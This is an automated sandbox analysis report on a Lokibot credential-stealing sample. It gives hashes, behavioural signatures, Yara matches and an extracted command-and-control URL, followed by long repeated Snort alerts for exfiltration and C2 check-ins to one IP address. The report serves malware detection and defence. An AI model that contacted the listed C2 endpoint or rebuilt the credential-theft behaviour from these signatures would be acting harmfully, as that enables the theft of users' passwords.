Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.20770

Overview

General Information

Sample Name:SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.20770 (renamed file extension from 20770 to exe)
Analysis ID:325825
MD5:2aaa15e28835feda9a2e223d82db2126
SHA1:2c4ace288456010a2717597b192827cd9f7ec771
SHA256:e385b8f5946a41469f49fad4aaeb98e510e79afd0ba6c8546c7b6548da61b8e6
Tags:Loki

Most interesting Screenshot:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AntiVM_3
Yara detected Lokibot
Yara detected Lokibot
.NET source code contains potential unpacker
Binary contains a suspicious time stamp
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Yara detected aPLib compressed binary
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Startup

  • System is w10x64
  • cleanup

Malware Configuration

Threatname: Lokibot

{"c2:": "http://nevomw.com/candy/five/fre.php"}

Yara Overview

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000001.00000003.480912778.0000000000E84000.00000004.00000001.sdmpJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
      00000001.00000002.607799523.0000000000E68000.00000004.00000020.sdmpJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
        00000001.00000003.476321253.0000000000E84000.00000004.00000001.sdmpJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
          00000001.00000003.452594690.0000000000E7C000.00000004.00000001.sdmpJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
            00000000.00000002.363916312.00000000033BD000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 53 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              1.2.SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe.400000.0.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                1.2.SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe.400000.0.raw.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
                  1.2.SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe.400000.0.raw.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
                    1.2.SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe.400000.0.raw.unpackLoki_1Loki Payloadkevoreilly
                    • 0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
                    • 0x153fc:$a2: last_compatible_version
                    1.2.SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe.400000.0.raw.unpackLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
                    • 0x13bff:$des3: 68 03 66 00 00
                    • 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
                    • 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
                    Click to see the 5 entries

                    Sigma Overview

                    No Sigma rule has matched

                    Signature Overview

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection:

                    barindex
                    Found malware configurationShow sources
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe.4852.1.memstrMalware Configuration Extractor: Lokibot {"c2:": "http://nevomw.com/candy/five/fre.php"}
                    Multi AV Scanner detection for domain / URLShow sources
                    Source: nevomw.comVirustotal: Detection: 10%Perma Link
                    Source: http://nevomw.com/candy/five/fre.phpVirustotal: Detection: 12%Perma Link
                    Multi AV Scanner detection for submitted fileShow sources
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeVirustotal: Detection: 39%Perma Link
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeReversingLabs: Detection: 20%
                    Machine Learning detection for sampleShow sources
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeCode function: 1_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,1_2_00403D74
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeCode function: 4x nop then jmp 07AC5FADh0_2_07AC5F28
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeCode function: 4x nop then jmp 07AC5FADh0_2_07AC5F38

                    Networking:

                    barindex
                    Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                    Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.6:49712 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49712 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49712 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.6:49712 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.6:49713 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49713 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49713 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.6:49713 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49714 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49714 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49714 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49714 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49714
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49715 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49715 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49715 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49715 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49715
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49716 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49716 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49716 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49716 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49716
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49717 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49717 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49717 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49717 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49717
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49718 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49718 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49718 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49718 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49718
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49720 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49720 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49720 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49720 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49720
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49721 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49721 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49721 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49721 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49721
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49722 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49722 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49722 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49722 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49722
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49723 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49723 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49723 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49723 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49723
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49724 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49724 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49724 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49724 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49724
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49725 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49725 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49725 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49725 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49725
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49726 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49726 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49726 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49726 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49726
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49727 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49727 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49727 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49727 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49727
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49728 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49728 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49728 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49728 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49728
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49729 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49729 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49729 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49729 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49729
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49730 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49730 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49730 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49730 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49730
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49731 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49731 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49731 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49731 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49731
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49732 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49732 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49732 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49732 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49732
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49733 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49733 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49733 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49733 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49733
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49734 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49734 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49734 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49734 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49734
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49735 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49735 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49735 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49735 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49735
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49737 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49737 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49737 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49737 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49737
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49740 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49740 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49740 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49740 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49740
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49741 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49741 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49741 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49741 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49741
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49742 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49742 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49742 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49742 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49742
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49743 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49743 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49743 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49743 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49743
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49744 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49744 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49744 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49744 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49744
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49745 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49745 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49745 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49745 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49745
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49746 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49746 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49746 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49746 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49746
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49747 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49747 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49747 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49747 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49747
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49748 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49748 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49748 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49748 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49748
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49749 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49749 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49749 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49749 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49749
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49750 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49750 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49750 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49750 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49750
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49751 -> 45.144.3.234:80
